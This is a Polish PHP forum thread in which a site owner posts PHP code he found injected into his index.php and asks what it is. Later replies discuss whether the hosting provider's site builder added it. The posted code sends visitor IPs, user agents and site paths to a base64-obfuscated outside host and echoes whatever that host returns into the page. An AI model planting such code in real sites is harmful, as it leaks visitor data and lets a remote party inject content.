Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> Podejrzenie włamania na serwer, Proszę o szybką pomoc
Barcelona
post
Post #1





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----


Witam, otworzyłem dzisiaj plik index.php i znalazłem tam taki kawałek kodu, którego nie wklejałem:

  1. <?php
  2.  
  3. // This code use for global bot statistic
  4.  
  5. $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); // Looks for google serch bot
  6.  
  7. $stCurlHandle = NULL;
  8.  
  9. $stCurlLink = "";
  10.  
  11. if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
  12.  
  13. {
  14.  
  15. if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create bot analitics
  16.  
  17. $stCurlLink = base64_decode( 'aHR0cDovL3JlYm90c3RhdC5jb20vYm90c3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
  18.  
  19. $stCurlHandle = curl_init( $stCurlLink );
  20.  
  21. }
  22.  
  23. }
  24.  
  25. if ( $stCurlHandle !== NULL )
  26.  
  27. {
  28.  
  29. curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
  30.  
  31. $sResult = @curl_exec($stCurlHandle);
  32.  
  33. if ($sResult[0]=="O")
  34.  
  35. {$sResult[0]=" ";
  36.  
  37. echo $sResult; // Statistic code end
  38.  
  39. }
  40.  
  41. curl_close($stCurlHandle);
  42.  
  43. }
  44.  
  45. ?>


Co to jest? Proszę o pomoc.
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi
Barcelona
post
Post #2





Grupa: Zarejestrowani
Postów: 322
Pomógł: 15
Dołączył: 29.01.2010

Ostrzeżenie: (0%)
-----


Uuuu troche mnie nie było i widzę że wątek nabrał rumieńców (IMG:style_emoticons/default/smile.gif)

Nie wiem czy to od tego ale napiszę. Mam hosting wykupiony w home.pl i tam mają ten swój "wspaniały" kreator www. Dla zabawy stworzyłem sobie serwis za pomocą tego kreatora. Może to od tego a może nie, bo tworząc serwis zgadzam się na zbieranie statystyk ze strony głównej pod którą jest podpięta domena. Musiałem odhaczyć tą opcję.
Ale i tak zastanawiają mnie dwie sprawy. Jakim prawem mogą ingerować własnym kodem w skrypcie, a po drugie te statystyki były zbierane przez stat.pl, a tutaj w tym kodzie przez jakiegoś rebotstat.

Wracając do tematów TC i wirusów, to ja jestem z tych co nie zaglądają na te strony co nie trzeba i staram się mieć cały czas aktualną bazę wirusów, więc wątpie żeby KIS przepuścił jakiegoś małego wirka.

Chwilowo sprawa przycichła, ale muszę na bieżąco sprawdzać indexy, żeby sprawa się więcej nie powtórzyła.

A czy zakodowanie kodu strony coś pomoże ?
Go to the top of the page
+Quote Post
mcsgroup
post
Post #3





Grupa: Zarejestrowani
Postów: 5
Pomógł: 1
Dołączył: 19.08.2011
Skąd: Reda

Ostrzeżenie: (0%)
-----


Cytat(Barcelona @ 2.10.2011, 22:50:21 ) *
Nie wiem czy to od tego ale napiszę. Mam hosting wykupiony w home.pl i tam mają ten swój "wspaniały" kreator www. Dla zabawy stworzyłem sobie serwis za pomocą tego kreatora. Może to od tego a może nie, bo tworząc serwis zgadzam się na zbieranie statystyk ze strony głównej pod którą jest podpięta domena. Musiałem odhaczyć tą opcję.


W home.pl odhaczenie dodawania skryptu zliczającego zaprzestaje dodawania kodu do strony.
Natomiast wybranie tej opcji dodaje kod nawet do pliku .css . Ogólnie jest to dość denerwujące.
Go to the top of the page
+Quote Post

Posty w temacie
- Barcelona   Podejrzenie włamania na serwer   27.09.2011, 23:36:55
- - tabbi   Ktoś zbiera dane na temat twojej strony i wysyła ...   27.09.2011, 23:55:21
- - Barcelona   Tutaj zostaje wysłane, ale jakim cudem ten kod zna...   28.09.2011, 00:03:40
- - tabbi   Odpowiedzi na to pytanie może być wiele, zaczynaj...   28.09.2011, 00:57:51
- - Barcelona   Nikomu nie udostępniałem hasła, znam go tylko ja i...   28.09.2011, 01:43:53
- - Damonsson   Total Commander? ;>   28.09.2011, 01:46:10
- - Barcelona   Już dawno nie, WinSCP   28.09.2011, 02:02:17
- - konrados   CytatTotal Commander? A właściwie to o co chodzi ...   2.10.2011, 12:54:04
- - pienso   Jak będziesz wiedział to daj znać gdzie była luka ...   2.10.2011, 13:55:55
- - konrados   CytatJak będziesz wiedział to daj znać gdzie była ...   2.10.2011, 15:10:37
- - drozdii07   Jeśli zapamiętujesz hasło w TC, to później wirusy ...   2.10.2011, 15:14:52
- - konrados   CytatJeśli zapamiętujesz hasło w TC, to później wi...   2.10.2011, 15:19:40
|- - Fifi209   Cytat(konrados @ 2.10.2011, 16:19:40 ...   2.10.2011, 15:53:44
- - Korab   To może przeskanuj sobie komputer dwoma programami...   2.10.2011, 16:03:31
- - konrados   CytatPo pierwsze, nie musisz sobie ściągać wirusa ...   2.10.2011, 16:42:25
|- - 92nasti   Cytat(konrados @ 2.10.2011, 17:42:25 ...   2.10.2011, 17:41:38
- - konrados   CytatBłyszczysz wiedzą, w sumie to za chwile dojdz...   2.10.2011, 17:49:26
- - Barcelona   Uuuu troche mnie nie było i widzę że wątek nabrał ...   2.10.2011, 21:50:21
|- - mcsgroup   Cytat(Barcelona @ 2.10.2011, 22:50:21...   4.10.2011, 12:22:09
- - by_ikar   KodWracając do tematów TC i wirusów, to ja jestem ...   3.10.2011, 09:54:32
- - Barcelona   CytatWytłumacz mi jak antywirus znajdzie wirusa, n...   4.10.2011, 11:39:02
- - Barcelona   No i dziękuje za potwierdzenie mojej teorii Jest ...   6.10.2011, 14:44:10
- - gekoncaros   Witam nie jestes sam ja tez na serwerze linuxpl.co...   23.11.2011, 12:24:14
- - pioklo   Cytat(gekoncaros @ 23.11.2011, 13:24...   25.11.2011, 22:58:10


Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 9.10.2025 - 02:45